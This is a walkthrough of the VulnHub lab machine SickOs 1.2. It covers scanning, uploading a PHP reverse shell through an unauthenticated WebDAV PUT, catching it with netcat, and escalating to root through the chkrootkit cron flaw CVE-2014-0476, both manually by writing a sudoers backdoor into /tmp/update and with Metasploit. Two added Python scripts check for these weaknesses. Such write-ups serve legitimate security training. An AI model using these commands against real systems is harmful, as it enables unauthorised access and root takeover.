VulnHub machine walkthrough [SickOs-1-2]

Name

Name: SickOs: 1.2
Release date: 27 April 2016

Download

  • Download (Mirror): https://download.vulnhub.com/sickos/sick0s1.2.zip
  • Download (Torrent): https://download.vulnhub.com/sickos/sick0s1.2.zip.torrent

Description

Name........: SickOs1.2
Date Release: 26 Apr 2016
Author......: D4rk
Series......: SickOs
Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
Tester(s)...: h1tch1, Eagle11
Twitter.....: https://twitter.com/D4rk36
This is the second release in the SickOs series. It is unrelated to the previous one, and the scope of the challenge is to obtain the highest privileges on the system.
Filename: Sick0s1.2.zip
File size: 696.2 MB
MD5: b013ba76f50c15890554632a40b697bd
SHA1: 9f45f7c060e15dc6bb93c1cf39efdd75125e30a0
Format: OVF
Operating System: Ubuntu
Tested on: VMWare workstation Pro 12.1.0 build-3272444
DHCP service: Enabled
IP address: Automatically assign

VMware is required; there may be problems with VirtualBox. If you want to open it in VirtualBox, the workaround is: open the .ovf file, replace every instance of "ElementName" with "Caption" and "vmware.sata.ahci" with "AHCI", delete the .mf file, and then import as usual.

Information gathering

Start with nmap: a ping sweep to find the host, a full-port version scan, then the vuln scripts against the two open ports.

root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.14
Host is up (0.00033s latency).
MAC Address: 00:0C:29:1B:36:86 (VMware)
root@kali:~# nmap -sV -v -p- 192.168.66.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
root@kali:~# nmap -A -v -p 22,80 192.168.66.14 -T4 --script=vuln
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http lighttpd 1.4.28
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.28:
| CVE-2013-4559 7.6 https://vulners.com/cve/CVE-2013-4559
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2013-4508 5.8 https://vulners.com/cve/CVE-2013-4508
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
| CVE-2011-4362 5.0 https://vulners.com/cve/CVE-2011-4362
|_ CVE-2013-4560 2.6 https://vulners.com/cve/CVE-2013-4560

Directory brute-forcing with dirb

root@kali:~# dirb http://192.168.66.14/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Mar 30 01:39:50 2020
URL_BASE: http://192.168.66.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.66.14/ ----
+ http://192.168.66.14/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.66.14/test/

---- Entering directory: http://192.168.66.14/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Mar 30 01:40:02 2020
DOWNLOADED: 4612 - FOUND: 1

Directory listing is enabled on /test, but there is nothing interesting in it. I then checked the HTTP OPTIONS method on / and on /test and found that /test allows a large number of HTTP methods.

request

OPTIONS /test/ HTTP/1.1
Host: 192.168.66.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

response

HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Connection: close
Date: Mon, 30 Mar 2020 05:42:43 GMT
Server: lighttpd/1.4.28
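The response above is the whole finding: lighttpd advertises DAV and returns two separate Allow headers, the first of which carries the write verbs. The following script is an added example (not part of the original write-up) that parses such an OPTIONS response and flags unauthenticated write access; SAMPLE_RESPONSE is a constructed copy of the capture above, and the lighttpd directive named in the final comment is the assumed fix.

```python
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH",
                 "LOCK", "UNLOCK", "PATCH"}

# Constructed sample: the OPTIONS /test/ response captured above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "DAV: 1,2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK\r\n"
    "Allow: OPTIONS, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
)

def _header_lines(raw_response):
    """Normalise line endings and return (status_line, [header lines])."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    return lines[0], lines[1:]

def parse_allowed_methods(raw_response):
    """Union of every Allow: header. lighttpd sends two of them here; a parser
    that keeps only the first (or only the last) would miss the WebDAV verbs."""
    _, headers = _header_lines(raw_response)
    methods = set()
    for line in headers:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods

def webdav_write_exposed(raw_response):
    """Risk summary for an *anonymous* OPTIONS probe: a 401/403 means the
    server demanded credentials; a 200 listing write verbs means it did not."""
    status_line, headers = _header_lines(raw_response)
    status = int(status_line.split()[1])
    dav = any(h.lower().startswith("dav:") for h in headers)
    exposed = sorted(parse_allowed_methods(raw_response) & WRITE_METHODS)
    return {"status": status, "dav": dav, "write_methods": exposed,
            "exposed": status == 200 and bool(exposed)}

if __name__ == "__main__":
    print(webdav_write_exposed(SAMPLE_RESPONSE))
    # Assumed fix on lighttpd: webdav.is-readonly = "enable" for /test, or put
    # the location behind mod_auth so PUT/DELETE/MKCOL require credentials.
```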

Exploitation

The HTTP PUT method is allowed without any authentication, so an attacker can use PUT to upload a web shell into /test. The following curl command uploads php-reverse-shell.php:

root@kali:~/vulnhub/sickos# curl --upload-file php-reverse-shell.php -v --url http://192.168.233.129/test/shell.php -0 --http1.0
* Trying 192.168.233.129:80...
* TCP_NODELAY set
* Connected to 192.168.233.129 (192.168.233.129) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.233.129
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 5494
>
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Mon, 30 Mar 2020 05:50:14 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0

The 201 Created response shows that the PHP reverse shell was uploaded successfully.

On the Kali side, listen on the port with nc, then open the shell's URL in a browser; the reverse shell connects back:

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.233.128] from (UNKNOWN) [192.168.233.129] 48337
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
23:07:02 up 8 min, 0 users, load average: 0.03, 0.03, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/

I first tried listening on TCP port 8890, but no connection reached my listener; I then changed the listening port to 443, edited the php reverse shell to match, uploaded it again, and only then received the shell.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Enumerate the OS version and installed packages.

www-data@ubuntu:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.4 LTS
Release: 12.04
Codename: precise
www-data@ubuntu:/$ dpkg -l | grep chkrootkit
dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector

Checking the cron jobs shows a chkrootkit entry in cron.daily. Knowing the chkrootkit vulnerability CVE-2014-0476, this may be a way to escalate to root.

A vulnerable chkrootkit executes /tmp/update, so we can create a file named update in /tmp containing a shell command that grants sudo access to the www-data user:
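From the defender's side, the condition being exploited here is a chkrootkit older than 0.50 (the release that fixed CVE-2014-0476) running from cron as root while /tmp/update is writable by an unprivileged user. The following host check is an added example, not part of the original write-up; it parses the dpkg line shown above and inspects a /tmp-style directory, and the tmp_dir parameter is an assumption so it can be pointed at a test directory.

```python
import os
import re
import stat

FIXED_UPSTREAM = (0, 50)  # chkrootkit 0.50 quoted the variable behind CVE-2014-0476

def parse_dpkg_line(line):
    """Parse a 'dpkg -l' row like 'rc chkrootkit 0.49-4ubuntu1.1 rootkit detector'
    into (status, version), or None. Status 'rc' means removed with config files
    left behind, so a copy installed from source must be checked separately."""
    parts = line.split()
    if len(parts) < 3 or parts[1] != "chkrootkit":
        return None
    return parts[0], parts[2]

def upstream_version(debian_version):
    """Strip the Debian revision ('-4ubuntu1.1') and return (major, minor)."""
    m = re.match(r"(\d+)\.(\d+)", debian_version.split("-", 1)[0])
    return (int(m.group(1)), int(m.group(2))) if m else None

def version_vulnerable(debian_version):
    """True when the upstream version predates 0.50. Caveat: distributions
    backport fixes without bumping the upstream number; confirm in the changelog."""
    v = upstream_version(debian_version)
    return v is not None and v < FIXED_UPSTREAM

def audit_update_file(tmp_dir="/tmp"):
    """Describe <tmp_dir>/update, the file chkrootkit would run as root from cron.
    Anything present here that root did not create is a red flag."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.lexists(path):
        return {"present": False}
    st = os.lstat(path)
    return {
        "present": True,
        "path": path,
        "non_root_owner": st.st_uid != 0,
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        "executable": bool(st.st_mode & stat.S_IXUSR),
    }

def assess(dpkg_line, tmp_dir="/tmp"):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    parsed = parse_dpkg_line(dpkg_line)
    if parsed and version_vulnerable(parsed[1]):
        findings.append(f"chkrootkit {parsed[1]} predates the 0.50 fix for CVE-2014-0476")
    f = audit_update_file(tmp_dir)
    if f["present"] and (f["non_root_owner"] or f["world_writable"]):
        findings.append(f"{f['path']} exists and is owned or writable by a non-root user")
    return findings
```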

www-data@ubuntu:/$ echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
< ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
www-data@ubuntu:/$

Then make it executable and confirm the file is in place:

www-data@ubuntu:/tmp$ chmod 777 *
chmod 777 *
chmod: changing permissions of `VMwareDnD': Operation not permitted
chmod: changing permissions of `vgauthsvclog.txt.0': Operation not permitted
chmod: changing permissions of `vmware-root': Operation not permitted
www-data@ubuntu:/tmp$ ls -la
ls -la
total 24
drwxrwxrwt 4 root root 4096 Mar 29 23:24 .
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
drwxrwxrwt 2 root root 4096 Mar 29 22:58 VMwareDnD
srwxrwxrwx 1 www-data www-data 0 Mar 29 22:58 php.socket-0
-rwxrwxrwx 1 www-data www-data 76 Mar 29 23:18 update
-rw-r--r-- 1 root root 1600 Mar 29 22:58 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Mar 29 22:58 vmware-root

Then wait a few minutes for cron to run chkrootkit:

root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:~# ls
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Root privileges obtained, and the flag found.

Privilege escalation 2 (using msf)

Set up msf, use the earlier php-reverse-shell to send the shell back to msf, then put the session in the background:

root@kali:~# msfdb run
[i] Database already started


.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v5.0.80-dev ]
+ -- --=[ 1983 exploits - 1088 auxiliary - 339 post ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: You can use help to view all available commands

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set lhost 192.168.233.128
lhost => 192.168.233.128
msf5 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.233.128:443
[*] Command shell session 1 opened (192.168.233.128:443 -> 192.168.233.129:48340) at 2020-03-30 02:40:05 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/
$ whoami
www-data
$ backgroud
/bin/sh: 5: backgroud: not found
$ background

Background session 1? [y/N] y
msf5 exploit(multi/handler) >

Next, search for the chkrootkit exploit module and configure it in msf:

msf exploit(handler) > search chkroot

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/local/chkrootkit 2014-06-04 manual Chkrootkit Local Privilege Escalation


msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(chkrootkit) > set session 1
session => 1
msf exploit(chkrootkit) > set lport 8080
lport => 8080

Also set lhost to 192.168.233.128, then wait for the shell to come back:

msf5 exploit(unix/local/chkrootkit) > set LHOST 192.168.233.128
LHOST => 192.168.233.128
msf5 exploit(unix/local/chkrootkit) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP double handler on 192.168.233.128:8080
msf5 exploit(unix/local/chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo m6QrrJnhcNykbebU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "m6QrrJnhcNykbebU\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.233.128:8080 -> 192.168.233.129:37735) at 2020-03-30 03:15:49 -0400
[+] Deleted /tmp/update
id
[*] exec: id

uid=0(root) gid=0(root) 组=0(root)
msf5 exploit(unix/local/chkrootkit) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UT... 192.168.233.128:443 -> 192.168.233.129:48369 (192.168.233.129)
2 shell cmd/unix 192.168.233.128:8080 -> 192.168.233.129:37735 (192.168.233.129)

msf5 exploit(unix/local/chkrootkit) > sessions 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

Root privileges obtained; now find the flag:

msf5 exploit(unix/local/chkrootkit) > sessions 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:~# ls
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Flag obtained.

Summary of key points

  • HTTP PUT method used to write a shell
  • cron job + chkrootkit vulnerability CVE-2014-0476 for privilege escalation
  • msf module exploit/unix/local/chkrootkit for privilege escalation

Game over

Sorry, once again I could not find that Greek expert's idiot-proof one-click clear script. I am so sorry about this… It's a pity…

The end, to be continued…